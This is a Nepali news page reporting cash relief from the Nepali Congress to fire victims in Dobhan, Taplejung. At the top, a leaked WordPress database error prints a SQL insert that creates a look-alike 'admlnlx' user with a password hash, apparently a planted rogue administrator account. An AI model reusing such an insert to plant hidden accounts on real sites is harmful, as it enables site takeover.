WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPT23PmL1IJUxYbO/X/Q5tnmy4CeMS/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 20:50:38', '', 'admlnlx', 'admlnlx')

ताप्लेजुङका आगलागीपीडितलाई राहत – Gaule Khabar

ताप्लेजुङका आगलागीपीडितलाई राहत

ताप्लेजुङका आगलागीपीडितलाई राहत

ताप्लेजुङ । नेपाली कांग्रेस केन्द्रीय कार्यसमितिले ताप्लेजुङको दोभानलगायतका अग्निपीडितलाई राहत प्रदान गरेको छ । कांग्रेस जिल्ला कार्यसमिति ताप्लेजुङमार्फत दोभानका ६० र अन्य क्षेत्रका गरी ६५ परिवारलाई रु छ लाख प्रदान गरेको हो ।

प्रतिपरिवार रु नौ हजारदेखि १८ हजारका दरले राहत रकम वितरण गरिएको कांग्रेस ताप्लेजुङले जनाएको छ । बिहीबार दोभानबजारमा राहत वितरण कार्यक्रमको आयोजना गरी नगद नै वितरण गरिएको हो । कांग्रेस जिल्ला सभापति लीलादेवी बोखिम, पूर्वसभापति केशव दाहाललगायतले राहत रकम हस्तान्तरण गर्नुभएको थियो । केन्द्रीय कार्यसमितिले जिल्ला कार्यसमितिमार्फत वितरण हुने गरी राहत रकम पठाएको थियो ।

यस्तै त्रिचन्द्र कलेजमा अध्ययनरत ताप्लेजुङका विद्यार्थीको अगुवाइमा सङ्कलित रु ६० हजारसमेत सोही कार्यक्रमका बीच वितरण गरिएको छ । गत फागुन १८ गते भएको आगलागीबाट दोभानका ५० घर जलेर नष्ट भएका थिए भने ६० परिवार विस्थापित बनेका थिए । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका